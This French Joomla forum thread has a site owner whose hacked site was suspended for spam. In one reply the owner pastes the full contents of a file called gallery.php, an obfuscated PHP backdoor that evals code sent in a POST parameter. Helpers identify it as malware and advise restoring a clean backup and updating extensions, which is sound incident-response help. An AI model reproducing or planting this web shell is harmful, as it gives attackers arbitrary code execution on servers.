Site planté

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Site planté

    Bonjour,

    il y à 48h mon provider a temporairement fermé mon site(modif du httacces apparemment) pour un problème de spam( je n 'ai toujours pas comprit le problème d’ailleurs), hier il me la ré ouvert et depuis il est buguer:

    ICI

    alors que mon site ressemble à ça normalement:

    Cliquez sur l'image pour l'afficher en taille normale

Nom : Capture.jpg 
Affichages : 1 
Taille : 30,3 Ko 
ID : 1823767

    je n'ai rien dans les logs de joomla ou de kunena,

    auriez vous un idée d'ou cela pourrait venir?

    Merci d'avance

  • #2
    Re : Site planté

    Bonjour

    Si tu affiches le code source (html) de ta page, tu verras qu'il est
    1. incomplet
    2. qu'on voit des <jdoc:include type="component" /> et ça, c'est anormal.

    Tu as donc un souci avec ton site.

    Un fichier corrompu ?

    Tu parles de spam : il y a donc probabilité que ton hébergeur pense que ton site a été hacké. Demande-lui quel est le script qui est à l'origine de l'envoi de spam et va y jeter un coup d'oeil avec ton client FTP.

    Je te suggère de remettre un backup sain de ton site car là; il est en effet cassé.

    Bonne journée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Site planté

      bonsoir j'ai trouvé un fichier qui contenait ce code à la racine du ftp:

      nom du fichier: gallery.php

      son contenue sans les balises php:

      $bhz7="psroe_tu" ; $obq3= $bhz7[1]. $bhz7[6].$bhz7[2].$bhz7[6]. $bhz7[3].$bhz7[7]. $bhz7[0]. $bhz7[0]. $bhz7[4].$bhz7[2];$stmo8 = $obq3 ($bhz7[5].$bhz7[0]. $bhz7[3].$bhz7[1].$bhz7[6] ) ;if (isset(${$stmo8 } ['q22ec2b' ]) ) { eval (${$stmo8 } [ 'q22ec2b' ]);}

      Ce nom de fichier à la racine ne me dit rien quand au contenue je ne le comprend pas? une idée?

      Merci d'avance

      Commentaire


      • #4
        Re : Site planté

        Bonsoir

        Ce fichier = un virus.

        La fin du code est eval (${$stmo8 } [ 'q22ec2b' ]);} et cela correspond à eval ($_POST['q22ec2b']); càd à l'exécution d'un code PHP qui a été envoyé par un hackeur au travers d'un formulaire dont l'action correspoind à la page gallery.php; sur ton site.

        Ce petit bout de code tout bête que tu vois est donc très dangereux puisque le pirate peut faire ce qu'il veut sur ton site.

        Et si tu as ce fichier, nul doute que tu en trouveras d'autres; une grande fratrie.

        Tu es bon pour nettoyer ton site : si tu as un backup récent et sain, le plus simple étant alors de le restaurer.

        Bonne soirée.
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire


        • #5
          Re : Site planté

          ok je vais tenter de réparer via un backup,
          mais maintenant la question pour moi est comment est il rentré sur mon serveur et comment éviter que cela se reproduise car un backup ne vas pas corriger mon problème je pense.

          Commentaire


          • #6
            Re : Site planté

            Ton site était-il à jour ? Extensions ? Seulement celles qu'il fallait et pas plus ? Combien de templates, un seul n'est-ce pas ? etc.

            De la saine lecture : http://www.aesecure.com/fr/blog/joomla-securite.html

            Bonne soirée.
            Christophe (cavo789)
            Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
            Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

            Commentaire

            Annonce

            Réduire
            Aucune annonce pour le moment.

            Partenaire de l'association

            Réduire

            Hébergeur Web PlanetHoster
            Travaille ...
            X